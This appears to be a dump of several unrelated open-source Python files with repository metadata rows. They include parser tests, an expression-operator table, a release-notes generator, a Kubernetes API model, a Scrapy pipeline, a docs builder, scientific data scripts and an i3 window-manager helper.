with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/hosts.out'), 'r') as f:
self.centos_7_7_hosts = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/hosts.out'), 'r') as f:
self.ubuntu_18_4_hosts = f.read()
# output
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/centos-7.7/hosts.json'), 'r') as f:
self.centos_7_7_hosts_json = json.loads(f.read())
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/ubuntu-18.04/hosts.json'), 'r') as f:
self.ubuntu_18_4_hosts_json = json.loads(f.read())
def test_hosts_centos_7_7(self):
"""
Test 'cat /etc/hosts' on Centos 7.7
"""
self.assertEqual(jc.parsers.hosts.parse(self.centos_7_7_hosts, quiet=True), self.centos_7_7_hosts_json)
def test_hosts_ubuntu_18_4(self):
"""
Test 'cat /etc/hosts' on Ubuntu 18.4
"""
self.assertEqual(jc.parsers.hosts.parse(self.ubuntu_18_4_hosts, quiet=True), self.ubuntu_18_4_hosts_json)
if __name__ == '__main__':
unittest.main()
| 32.536585 | 113 | 0.648426 |
fea655d2a46fa8b926d9958ee82f644925010fca | 1,153 | py | Python | pyjexl/operators.py | Mozilla-GitHub-Standards/cdc4ff6c2ab805b1af7644e7bb46e234f75ed6f45092a5954bb0a727eaaa7b34 | efba20f8a2f8a000af963c6b92046ed3bcbaae79 | [
"MIT"
] | 8 | 2016-08-28T03:47:58.000Z | 2021-07-03T18:44:49.000Z | pyjexl/operators.py | Mozilla-GitHub-Standards/cdc4ff6c2ab805b1af7644e7bb46e234f75ed6f45092a5954bb0a727eaaa7b34 | efba20f8a2f8a000af963c6b92046ed3bcbaae79 | [
"MIT"
] | 9 | 2016-07-31T07:19:01.000Z | 2018-03-21T21:17:04.000Z | pyjexl/operators.py | Mozilla-GitHub-Standards/cdc4ff6c2ab805b1af7644e7bb46e234f75ed6f45092a5954bb0a727eaaa7b34 | efba20f8a2f8a000af963c6b92046ed3bcbaae79 | [
"MIT"
] | 4 | 2016-08-19T18:09:48.000Z | 2020-04-24T14:32:20.000Z | import operator
class Operator(object):
__slots__ = ('symbol', 'precedence', 'evaluate')
def __init__(self, symbol, precedence, evaluate):
self.symbol = symbol
self.precedence = precedence
self.evaluate = evaluate
def __repr__(self):
return 'Operator({})'.format(repr(self.symbol))
default_binary_operators = {
'+': Operator('+', 30, operator.add),
'-': Operator('-', 30, operator.sub),
'*': Operator('*', 40, operator.mul),
'//': Operator('//', 40, operator.floordiv),
'/': Operator('/', 40, operator.truediv),
'%': Operator('%', 50, operator.mod),
'^': Operator('^', 50, operator.pow),
'==': Operator('==', 20, operator.eq),
'!=': Operator('!=', 20, operator.ne),
'>=': Operator('>=', 20, operator.ge),
'>': Operator('>', 20, operator.gt),
'<=': Operator('<=', 20, operator.le),
'<': Operator('<', 20, operator.lt),
'&&': Operator('&&', 10, lambda a, b: a and b),
'||': Operator('||', 10, lambda a, b: a or b),
'in': Operator('in', 20, lambda a, b: a in b),
}
default_unary_operators = {
'!': Operator('!', 1000, operator.not_),
}
| 29.564103 | 55 | 0.548135 |
5fa476cc5b8135cd83a194f376504191a219ff62 | 3,106 | py | Python | docs/release_gen.py | StrawberryLovah/UniVRM | 4ae9b94e89ede7d1eb481801e356f3491b813629 | [
"MIT"
] | 1,128 | 2019-04-24T01:11:52.000Z | 2022-03-31T02:09:04.000Z | docs/release_gen.py | StrawberryLovah/UniVRM | 4ae9b94e89ede7d1eb481801e356f3491b813629 | [
"MIT"
] | 688 | 2019-04-24T06:38:18.000Z | 2022-03-30T04:19:57.000Z | docs/release_gen.py | StrawberryLovah/UniVRM | 4ae9b94e89ede7d1eb481801e356f3491b813629 | [
"MIT"
] | 232 | 2019-04-23T19:08:25.000Z | 2022-03-29T11:40:33.000Z | #
# github Release の markdown を作るスクリプト
#
import pathlib
import re
import subprocess
HERE = pathlib.Path(__file__).absolute().parent
UNIVRM_VERSION = HERE.parent / 'Assets/VRM/Runtime/Format/VRMVersion.cs'
def gen(version: str, hash: str):
version_hash = f'{version}_{hash[0:4]}'
print(f'''
# Download
* for `Unity-2019.4.LTS` or later
* [UniVRM-{version_hash}.unitypackage](https://github.com/vrm-c/UniVRM/releases/download/v{version}/UniVRM-{version_hash}.unitypackage)
> `v0.87.0` から UniGLTF_VRMShaders と UniVRM が合体してひとつになりました。
> From `v0.87.0`, UniGLTF_VRMShaders and UniVRM have been merged into one.
ReleaseNote
* [日本語](https://vrm-c.github.io/UniVRM/ja/release/079/v{version}.html)
* [English](https://vrm-c.github.io/UniVRM/en/release/079/v{version}.html)
## other unitypackage
### UniVRM API sample
* [UniVRM_Samples-{version_hash}.unitypackage](https://github.com/vrm-c/UniVRM/releases/download/v{version}/UniVRM_Samples-{version_hash}.unitypackage)
### VRM-1.0Beta
* [VRM-{version_hash}.unitypackage](https://github.com/vrm-c/UniVRM/releases/download/v{version}/VRM-{version_hash}.unitypackage)
### VRM-1.0Beta API sample
* [VRM_Samples-{version_hash}.unitypackage](https://github.com/vrm-c/UniVRM/releases/download/v{version}/VRM_Samples-{version_hash}.unitypackage)
|package|folder|
|-|-|
|UniVRM|Assets/VRMShaders, Assets/UniGLTF, Assets/VRM|
|UniVRM_Samples|Assets/VRM_Samples|
|VRM|Assets/VRMShaders, Assets/UniGLTF, Assets/VRM10|
|VRM_Samples|Assets/VRM10_Samples|
# UPM
| UPM package | rename | UPM url |
|---------------------|------------------|------------------------------------------------------------------------|
| com.vrmc.vrmshaders | | https://github.com/vrm-c/UniVRM.git?path=/Assets/VRMShaders#v{version} |
| com.vrmc.gltf | com.vrmc.unigltf | https://github.com/vrm-c/UniVRM.git?path=/Assets/UniGLTF#v{version} |
| com.vrmc.univrm | | https://github.com/vrm-c/UniVRM.git?path=/Assets/VRM#v{version} |
| com.vrmc.vrm | com.vrmc.univrm1 | https://github.com/vrm-c/UniVRM.git?path=/Assets/VRM10#v{version} |
```json
// manifest.json
{{
"dependencies": {{
///
"com.vrmc.vrmshaders": "https://github.com/vrm-c/UniVRM.git?path=/Assets/VRMShaders#v{version}",
"com.vrmc.gltf": "https://github.com/vrm-c/UniVRM.git?path=/Assets/UniGLTF#v{version}",
"com.vrmc.univrm": "https://github.com/vrm-c/UniVRM.git?path=/Assets/VRM#v{version}",
"com.vrmc.vrm": "https://github.com/vrm-c/UniVRM.git?path=/Assets/VRM10#v{version}",
///
}}
}}
```
''')
def get_version() -> str:
m = re.search(r'public const string VERSION = "(\d.\d+.\d)";',
UNIVRM_VERSION.read_text(encoding='utf-8'))
if m:
return m[1]
raise Exception("no version")
def get_hash() -> str:
res = subprocess.check_output("git rev-parse HEAD")
return res.decode('utf-8')
if __name__ == '__main__':
version = get_version(UNIVRM_VERSION)
hash = get_hash()
gen(version, hash)
| 36.541176 | 151 | 0.645203 |
ac5effb9b3c269de03d861a49d152f95fc6a1274 | 6,498 | py | Python | kubernetes_asyncio/client/models/v1alpha1_subject.py | olitheolix/kubernetes_asyncio | 344426793e4e4b653bcd8e4a29c6fa4766e1fff7 | [
"Apache-2.0"
] | 1 | 2020-03-25T01:24:27.000Z | 2020-03-25T01:24:27.000Z | kubernetes_asyncio/client/models/v1alpha1_subject.py | olitheolix/kubernetes_asyncio | 344426793e4e4b653bcd8e4a29c6fa4766e1fff7 | [
"Apache-2.0"
] | null | null | null | kubernetes_asyncio/client/models/v1alpha1_subject.py | olitheolix/kubernetes_asyncio | 344426793e4e4b653bcd8e4a29c6fa4766e1fff7 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1.10.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class V1alpha1Subject(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'kind': 'str',
'name': 'str',
'namespace': 'str'
}
attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'name': 'name',
'namespace': 'namespace'
}
def __init__(self, api_version=None, kind=None, name=None, namespace=None): # noqa: E501
"""V1alpha1Subject - a model defined in Swagger""" # noqa: E501
self._api_version = None
self._kind = None
self._name = None
self._namespace = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.kind = kind
self.name = name
if namespace is not None:
self.namespace = namespace
@property
def api_version(self):
"""Gets the api_version of this V1alpha1Subject. # noqa: E501
APIVersion holds the API group and version of the referenced subject. Defaults to \"v1\" for ServiceAccount subjects. Defaults to \"rbac.authorization.k8s.io/v1alpha1\" for User and Group subjects. # noqa: E501
:return: The api_version of this V1alpha1Subject. # noqa: E501
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""Sets the api_version of this V1alpha1Subject.
APIVersion holds the API group and version of the referenced subject. Defaults to \"v1\" for ServiceAccount subjects. Defaults to \"rbac.authorization.k8s.io/v1alpha1\" for User and Group subjects. # noqa: E501
:param api_version: The api_version of this V1alpha1Subject. # noqa: E501
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""Gets the kind of this V1alpha1Subject. # noqa: E501
Kind of object being referenced. Values defined by this API group are \"User\", \"Group\", and \"ServiceAccount\". If the Authorizer does not recognized the kind value, the Authorizer should report an error. # noqa: E501
:return: The kind of this V1alpha1Subject. # noqa: E501
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""Sets the kind of this V1alpha1Subject.
Kind of object being referenced. Values defined by this API group are \"User\", \"Group\", and \"ServiceAccount\". If the Authorizer does not recognized the kind value, the Authorizer should report an error. # noqa: E501
:param kind: The kind of this V1alpha1Subject. # noqa: E501
:type: str
"""
if kind is None:
raise ValueError("Invalid value for `kind`, must not be `None`") # noqa: E501
self._kind = kind
@property
def name(self):
"""Gets the name of this V1alpha1Subject. # noqa: E501
Name of the object being referenced. # noqa: E501
:return: The name of this V1alpha1Subject. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this V1alpha1Subject.
Name of the object being referenced. # noqa: E501
:param name: The name of this V1alpha1Subject. # noqa: E501
:type: str
"""
if name is None:
raise ValueError("Invalid value for `name`, must not be `None`") # noqa: E501
self._name = name
@property
def namespace(self):
"""Gets the namespace of this V1alpha1Subject. # noqa: E501
Namespace of the referenced object. If the object kind is non-namespace, such as \"User\" or \"Group\", and this value is not empty the Authorizer should report an error. # noqa: E501
:return: The namespace of this V1alpha1Subject. # noqa: E501
:rtype: str
"""
return self._namespace
@namespace.setter
def namespace(self, namespace):
"""Sets the namespace of this V1alpha1Subject.
Namespace of the referenced object. If the object kind is non-namespace, such as \"User\" or \"Group\", and this value is not empty the Authorizer should report an error. # noqa: E501
:param namespace: The namespace of this V1alpha1Subject. # noqa: E501
:type: str
"""
self._namespace = namespace
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1alpha1Subject):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 32.328358 | 229 | 0.599107 |
6099254145e6a2a471210d1793d88c732123b558 | 908 | py | Python | Other files (test scripts etc.)/Project_1.py | dg1223/InsectRecognition-UniversityOfGuelph_SemiosBio-Project | 597ae45e04895984669b001129871ebed1a3178c | [
"MIT"
] | 2 | 2015-10-18T04:30:22.000Z | 2017-01-03T15:24:27.000Z | Other files (test scripts etc.)/Project_1.py | dg1223/InsectRecognition-UniversityOfGuelph_SemiosBio-Project | 597ae45e04895984669b001129871ebed1a3178c | [
"MIT"
] | null | null | null | Other files (test scripts etc.)/Project_1.py | dg1223/InsectRecognition-UniversityOfGuelph_SemiosBio-Project | 597ae45e04895984669b001129871ebed1a3178c | [
"MIT"
] | null | null | null | ## This script is modelled to run in iPyhton
import numpy as np
import matplotlib.pylab as plt
import PIL
import Image
import ImageOps as io
import scipy
import ndimage
import _imaging
import glob
import json
from pprint import pprint
### Perform contrast normalization on all the images if necessary
### Need to make it as a function which takes file path name, formatname, cutoff, targetpath, fmt
##
##cd 'your file path name here'
##
##list_of_files = glob.glob('*.formatname')
##list_of_files = np.array(list_of_files)
##
##for x in range(shape(list_of_files)[0]):
## image = Image.open(list_of_files[x])
## image = io.autocontrast(image cutoff = 0.1) # or any other cutoff percentage
## image.save('targetpath/' + list_of_files[x], 'fmt') # fmt = JPEG, PNG etc
# go to working directory
cd '/mnt/data/shamir/Annotation data set/Normalized Images/Good Images/Postive Counts/Training Set'
| 27.515152 | 99 | 0.741189 |
45321ba39832c61ca2df3ed63db239ac74187c45 | 788 | py | Python | plugin.video.vstream/resources/lib/handler/inputParameterHandler.py | akuala/REPO.KUALA | ea9a157025530d2ce8fa0d88431c46c5352e89d4 | [
"Apache-2.0"
] | 2 | 2018-11-02T19:55:30.000Z | 2020-08-14T02:22:20.000Z | plugin.video.vstream/resources/lib/handler/inputParameterHandler.py | akuala/REPO.KUALA | ea9a157025530d2ce8fa0d88431c46c5352e89d4 | [
"Apache-2.0"
] | null | null | null | plugin.video.vstream/resources/lib/handler/inputParameterHandler.py | akuala/REPO.KUALA | ea9a157025530d2ce8fa0d88431c46c5352e89d4 | [
"Apache-2.0"
] | 3 | 2019-12-17T20:47:00.000Z | 2021-02-11T19:03:59.000Z | import urllib
import sys
class cInputParameterHandler:
def __init__(self):
aParams = dict()
if len(sys.argv)>=2 and len(sys.argv[2])>0:
aParams = dict(part.split('=') for part in sys.argv[2][1:].split('&'))
self.__aParams = aParams
def getAllParameter(self):
return self.__aParams
def getValue(self, sParamName):
if self.exist(sParamName):
sParamValue = self.__aParams[sParamName]
if not sParamValue.startswith('http'):
return urllib.unquote_plus(sParamValue)
else:
return urllib.unquote(sParamValue)
return False
def exist(self, sParamName):
if sParamName in self.__aParams:
return sParamName
| 28.142857 | 82 | 0.585025 |
9e4cb502eb0f0c55605aabaec7e1aff4dd5388a2 | 1,156 | py | Python | liqian/purdue/research/research/pipelines.py | doge-search/webdoge | 443e758b5c1f962d5c2fe792cdbed01e1208b1cb | [
"Unlicense"
] | null | null | null | liqian/purdue/research/research/pipelines.py | doge-search/webdoge | 443e758b5c1f962d5c2fe792cdbed01e1208b1cb | [
"Unlicense"
] | null | null | null | liqian/purdue/research/research/pipelines.py | doge-search/webdoge | 443e758b5c1f962d5c2fe792cdbed01e1208b1cb | [
"Unlicense"
] | null | null | null | # -- coding: utf-8 --
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import os
import urllib
import xml.dom.minidom as minidom
class xmlPipeline(object):
def __init__(self):
self.fout_xml = file('../purdue_research.xml', 'w')
self.doc = minidom.Document()
self.institution = self.doc.createElement("institution")
self.doc.appendChild(self.institution)
self.cnt = 0
def process_item(self, item, spider):
research = self.doc.createElement("research")
self.institution.appendChild(research)
groupname = self.doc.createElement("groupname")
groupname.appendChild(self.doc.createTextNode(item['groupname'].encode('utf-8')))
research.appendChild(groupname)
for profname in item['proflist']:
namenode = self.doc.createElement("professorname")
namenode.appendChild(self.doc.createTextNode(profname.encode('utf-8')))
research.appendChild(namenode)
self.cnt += 1
def close_spider(self, spider):
print self.cnt
self.doc.writexml(self.fout_xml, "\t", "\t", "\n", encoding="utf-8")
self.fout_xml.close() | 33.028571 | 83 | 0.737024 |
6fe39d4b0fbec68902a2630accbc196b86b0b924 | 399 | py | Python | art of data/topics/descriptive stats/code/analyze_congress.py | lee-edu/materials | 529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22 | [
"MIT"
] | null | null | null | art of data/topics/descriptive stats/code/analyze_congress.py | lee-edu/materials | 529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22 | [
"MIT"
] | null | null | null | art of data/topics/descriptive stats/code/analyze_congress.py | lee-edu/materials | 529f13aee01bfe96e3d0b4dc84e07f68b7dd3f22 | [
"MIT"
] | null | null | null | '''
Help generate histogram for Descriptive Stat quiz
'''
import csv, seaborn as sns, pandas as pd
import matplotlib.pyplot as plt
import json
import numpy as np
ages = pd.read_csv('../../Datasets/congress-ages.csv')
#_data = ages.filter(like="113", axis=0)
_data = ages
#violin = sns.violinplot(data=ages, bw=0.3, x="age")
hist = sns.histplot(data=_data, bins=30, kde=False, x="age")
plt.show() | 23.470588 | 60 | 0.709273 |
db3d3d983f69dd07ff735b79db5e64251581264b | 244 | py | Python | mayan/apps/storage/dependencies.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 2 | 2021-09-12T19:41:19.000Z | 2021-09-12T19:41:20.000Z | mayan/apps/storage/dependencies.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 37 | 2021-09-13T01:00:12.000Z | 2021-10-02T03:54:30.000Z | mayan/apps/storage/dependencies.py | CMU-313/fall-2021-hw2-451-unavailable-for-legal-reasons | 0e4e919fd2e1ded6711354a0330135283e87f8c7 | [
"Apache-2.0"
] | 1 | 2021-09-22T13:17:30.000Z | 2021-09-22T13:17:30.000Z | from mayan.apps.dependencies.classes import PythonDependency
PythonDependency(
module=__name__, name='extract-msg', version_string='==0.23.3'
)
PythonDependency(
module=__name__, name='pycryptodome', version_string='==3.9.7'
)
| 27.111111 | 67 | 0.733607 |
054daee6481be69a3353899ef89b19429910e397 | 1,816 | py | Python | .config/i3/master.py | davvil/dotfiles | c4e8c7afe02ecf44663156e7a79ad3f4e6cb7741 | [
"MIT"
] | null | null | null | .config/i3/master.py | davvil/dotfiles | c4e8c7afe02ecf44663156e7a79ad3f4e6cb7741 | [
"MIT"
] | null | null | null | .config/i3/master.py | davvil/dotfiles | c4e8c7afe02ecf44663156e7a79ad3f4e6cb7741 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import i3ipc
import sys
import Xlib.display
from ewmh import EWMH
import autotag
windowLikeContainerLayouts = ["tabbed", "stacked"]
def selectContainerForSwap(c):
return c.layout in windowLikeContainerLayouts or not c.nodes
def selectContainerForFocus(c):
return not c.nodes
# Checks if a window is visible via ewmh properties
def isVisible(w, ewmh, dpy):
win = dpy.create_resource_object("window", w.window)
return "_NET_WM_STATE_HIDDEN" not in ewmh.getWmState(win, str=True)
def traverseTree(container, select):
if select(container):
yield container
else:
for n in container.nodes:
yield from traverseTree(n, select)
if len(sys.argv) > 1 and sys.argv[1] == "-f":
action = "focus"
selectFunction = selectContainerForFocus
ewmh = EWMH()
dpy = Xlib.display.Display()
else:
action = "swap"
selectFunction = selectContainerForSwap
ewmh = None
dpy = None
i3 = i3ipc.Connection()
focusedContainer = i3.get_tree().find_focused()
c = focusedContainer
while c and c.type == "con":
c = c.parent
if c and c.type == "con" and c.layout in windowLikeContainerLayouts:
focusedContainer = c
if focusedContainer:
wsTree = focusedContainer.workspace()
biggestContainer = None
biggestSize = 0
for c in traverseTree(wsTree, selectFunction):
totalSize = c.rect.width * c.rect.height
if totalSize > biggestSize:
if action == "focus" and not isVisible(c, ewmh, dpy):
continue
biggestContainer = c
biggestSize = totalSize
if action == "swap":
focusedContainer.command("swap container with con_id %s" % biggestContainer.id)
autotag.tagTree(i3, None)
else:
biggestContainer.command("focus")
| 27.515152 | 87 | 0.675661 |
dc79897fe7e59ce9d9514480e4851115034db565 | 1,581 | py | Python | tests/renderer/xml/test_view_service.py | openoereb/pyramid_oereb | d70c7fb15803b9454954e9f1d23727224bfd10bc | [
"BSD-2-Clause"
] | 4 | 2019-03-28T09:58:34.000Z | 2020-04-29T15:08:44.000Z | tests/renderer/xml/test_view_service.py | openoereb/pyramid_oereb | d70c7fb15803b9454954e9f1d23727224bfd10bc | [
"BSD-2-Clause"
] | 452 | 2019-02-05T10:10:43.000Z | 2022-03-31T08:27:38.000Z | tests/renderer/xml/test_view_service.py | openoereb/pyramid_oereb | d70c7fb15803b9454954e9f1d23727224bfd10bc | [
"BSD-2-Clause"
] | 20 | 2019-02-01T09:04:48.000Z | 2021-12-23T09:23:07.000Z | # -*- coding: utf-8 -*-
from tests.renderer import DummyRenderInfo
from pyramid_oereb.lib.renderer.extract.xml_ import Renderer
from tests.renderer.xml import xml_templates
from pyramid_oereb.lib.records.view_service import ViewServiceRecord
template = xml_templates().get_template('view_service.xml')
def test_empty():
map = ViewServiceRecord(
reference_wms=dict(),
layer_index=0,
layer_opacity=1.0
)
content = template.render(**{
'map': map
}).decode('utf-8').split('\n')
assert content[0] == '' # empty filler line
assert content[1] == '<data:layerIndex>0</data:layerIndex>'
assert content[2] == '<data:layerOpacity>1.0</data:layerOpacity>'
assert content[3] == '' # empty filler line
assert len(content) == 4
def test_reference_wms():
renderer = Renderer(DummyRenderInfo())
renderer._language = 'de'
map = ViewServiceRecord(
reference_wms={'de': 'http://example.com?SERVICE=WMS&REQUEST=GetMap&FORMAT=image/png&SRS=epsg:2056'},
layer_index=0,
layer_opacity=1.0
)
content = template.render(**{
'map': map,
'multilingual': renderer.get_multilingual_text
}).decode('utf-8').split('\n')
assert content[5].strip() == """
<data:Language>de</data:Language>
""".replace(" ", "").replace('\n', '')
assert content[6].strip() == """
<data:Text>
http://example.com?SERVICE=WMS&REQUEST=GetMap&FORMAT=image/png&SRS=epsg:2056
</data:Text>
""".replace(" ", "").replace('\n', '')
assert len(content) == 13
| 32.265306 | 109 | 0.641366 |
d8c9744b3c8a9e7789bffcb7e96395331c5bc073 | 3,669 | py | Python | build_scripts/update_docs.py | schroedk/sensAI | a2d6d7c6ab7bed9ccd5eac216dd988c49d69aec7 | [
"MIT"
] | 10 | 2020-02-19T09:16:54.000Z | 2022-02-04T16:19:33.000Z | build_scripts/update_docs.py | schroedk/sensAI | a2d6d7c6ab7bed9ccd5eac216dd988c49d69aec7 | [
"MIT"
] | 47 | 2020-03-11T16:26:51.000Z | 2022-02-04T15:29:40.000Z | build_scripts/update_docs.py | schroedk/sensAI | a2d6d7c6ab7bed9ccd5eac216dd988c49d69aec7 | [
"MIT"
] | 5 | 2020-03-12T21:33:22.000Z | 2020-12-21T14:43:04.000Z | #!/usr/bin/env python3
import logging
import os
import shutil
log = logging.getLogger(os.path.basename(__file__))
def module_template(module_qualname: str):
module_name = module_qualname.split(".")[-1]
title = module_name.replace("_", r"\_")
template = f"""{title}
{"="*len(title)}
.. automodule:: {module_qualname}
:members:
:undoc-members:
"""
return template
def package_template(package_qualname: str):
package_name = package_qualname.split(".")[-1]
title = package_name.replace("_", r"\_")
template = f"""{title}
{"="*len(title)}
.. automodule:: {package_qualname}
:members:
:undoc-members:
.. toctree::
:glob:
{package_name}/*
"""
return template
def indexTemplate(package_name):
title = "Modules"
template = \
f"""{title}
{"="*len(title)}
.. automodule:: {package_name}
:members:
:undoc-members:
.. toctree::
:glob:
*
"""
return template
def write_to_file(content: str, path: str):
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(path, "w") as f:
f.write(content)
os.chmod(path, 0o666)
def make_rst(src_root=os.path.join("src", "sensai"), rst_root=os.path.join("docs", "sensai"), clean=False, overwrite=False):
"""
Creates/updates documentation in form of rst files for modules and packages.
Does not delete any existing rst files. Thus, rst files for packages or modules that have been removed or renamed
should be deleted by hand.
This method should be executed from the project's top-level directory
:param src_root: path to library base directory, typically "src/<library_name>"
:param clean: whether to completely clean the target directory beforehand, removing any existing .rst files
:param overwrite: whether to overwrite existing rst files. This should be used with caution as it will delete
all manual changes to documentation files
:return:
"""
rst_root = os.path.abspath(rst_root)
if clean and os.path.isdir(rst_root):
shutil.rmtree(rst_root)
base_package_name = os.path.basename(src_root)
write_to_file(indexTemplate(base_package_name), os.path.join(rst_root, "index.rst"))
for root, dirnames, filenames in os.walk(src_root):
if os.path.basename(root).startswith("_"):
continue
base_package_relpath = os.path.relpath(root, start=src_root)
base_package_qualname = os.path.relpath(root, start=os.path.dirname(src_root)).replace(os.path.sep, ".")
for dirname in dirnames:
if not dirname.startswith("_"):
package_qualname = f"{base_package_qualname}.{dirname}"
package_rst_path = os.path.join(rst_root, base_package_relpath, f"{dirname}.rst")
log.info(f"Writing package documentation to {package_rst_path}")
write_to_file(package_template(package_qualname), package_rst_path)
for filename in filenames:
base_name, ext = os.path.splitext(filename)
if ext == ".py" and not filename.startswith("_"):
module_qualname = f"{base_package_qualname}.{filename[:-3]}"
module_rst_path = os.path.join(rst_root, base_package_relpath, f"{base_name}.rst")
if os.path.exists(module_rst_path) and not overwrite:
log.debug(f"{module_rst_path} already exists, skipping it")
log.info(f"Writing module documentation to {module_rst_path}")
write_to_file(module_template(module_qualname), module_rst_path)
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
make_rst(clean=True)
| 31.09322 | 124 | 0.668029 |
236de7cb89ad8d1b32da5d0908e51ba769813654 | 2,330 | py | Python | lib/sundials_6.1.1/benchmarks/advection_reaction_3D/scripts/pickle_solution_output.py | LaudateCorpus1/math | 990a66b3cccd27a5fd48626360bb91093a48278b | [
"BSD-3-Clause"
] | 36 | 2022-02-02T00:26:38.000Z | 2022-03-13T06:20:47.000Z | lib/sundials_6.1.1/benchmarks/advection_reaction_3D/scripts/pickle_solution_output.py | LaudateCorpus1/math | 990a66b3cccd27a5fd48626360bb91093a48278b | [
"BSD-3-Clause"
] | 9 | 2022-02-02T01:41:33.000Z | 2022-03-09T17:06:14.000Z | lib/sundials_6.1.1/benchmarks/advection_reaction_3D/scripts/pickle_solution_output.py | LaudateCorpus1/math | 990a66b3cccd27a5fd48626360bb91093a48278b | [
"BSD-3-Clause"
] | 3 | 2022-02-03T12:41:46.000Z | 2022-03-13T06:21:01.000Z | #!/usr/bin/env python
# -----------------------------------------------------------------------------
# SUNDIALS Copyright Start
# Copyright (c) 2002-2022, Lawrence Livermore National Security
# and Southern Methodist University.
# All rights reserved.
#
# See the top-level LICENSE and NOTICE files for details.
#
# SPDX-License-Identifier: BSD-3-Clause
# SUNDIALS Copyright End
# -----------------------------------------------------------------------------
# imports
import glob
import sys
import pylab as plt
import pandas as pd
import numpy as np
# load mesh data file
mesh = np.loadtxt('mesh.txt', dtype=np.double)
# X,Y,Z = np.meshgrid(mesh[0,:], mesh[1,:], mesh[2,:])
# calculate h
hx = mesh[0,1] - mesh[0,0]
hy = mesh[1,1] - mesh[1,0]
hz = mesh[2,1] - mesh[2,0]
nx = len(mesh[0,:])
ny = len(mesh[1,:])
nz = len(mesh[2,:])
print("nx, ny, nz = %d, %d, %d" % (nx, ny, nz))
print("hx, hy, hz = %g, %g, %g" % (hx, hy, hz))
# load output time file
times = np.loadtxt('t.000000.txt', dtype=np.double)
# load solution data files
ufiles = glob.glob('u.' + ('[0-9]'*6) + '.txt'); ufiles.sort()
vfiles = glob.glob('v.' + ('[0-9]'*6) + '.txt'); vfiles.sort()
wfiles = glob.glob('w.' + ('[0-9]'*6) + '.txt'); wfiles.sort()
udata = []
vdata = []
wdata = []
sys.stdout.write("reading 1/%d...\r" % len(ufiles))
sys.stdout.flush()
for idx in range(0,len(ufiles)):
sys.stdout.write("reading %d/%d...\r" % (idx+1,len(ufiles)))
sys.stdout.flush()
udata.append(pd.read_csv(ufiles[idx], header=None, delimiter=' ', skipinitialspace=True, dtype=np.double))
vdata.append(pd.read_csv(vfiles[idx], header=None, delimiter=' ', skipinitialspace=True, dtype=np.double))
wdata.append(pd.read_csv(wfiles[idx], header=None, delimiter=' ', skipinitialspace=True, dtype=np.double))
sys.stdout.write("\n")
sys.stdout.flush()
print("stacking...")
udata = pd.concat(udata, axis=1).to_numpy()
vdata = pd.concat(vdata, axis=1).to_numpy()
wdata = pd.concat(wdata, axis=1).to_numpy()
# reshape data into time,x,y,z arrays
print("reshaping...")
nt = len(times)
udata = np.reshape(udata, (nt, nx, ny, nz))
vdata = np.reshape(vdata, (nt, nx, ny, nz))
wdata = np.reshape(wdata, (nt, nx, ny, nz))
# save data to pickle
print("saving...")
np.savez_compressed('output-with-h-%.2e.npz' % hx, t=times, u=udata, v=vdata, w=wdata, mesh=mesh)
| 31.486486 | 110 | 0.608155 |
e50352c796c7853a28d91f263b65b7be066ab17a | 4,909 | py | Python | tensorflow_examples/lite/model_maker/core/task/object_detector.py | tariapper/examples | 21b515e0fe72c3f3447761a56e7cc7a8bd7af475 | [
"Apache-2.0"
] | 1 | 2021-04-16T11:55:41.000Z | 2021-04-16T11:55:41.000Z | tensorflow_examples/lite/model_maker/core/task/object_detector.py | tariapper/examples | 21b515e0fe72c3f3447761a56e7cc7a8bd7af475 | [
"Apache-2.0"
] | null | null | null | tensorflow_examples/lite/model_maker/core/task/object_detector.py | tariapper/examples | 21b515e0fe72c3f3447761a56e7cc7a8bd7af475 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
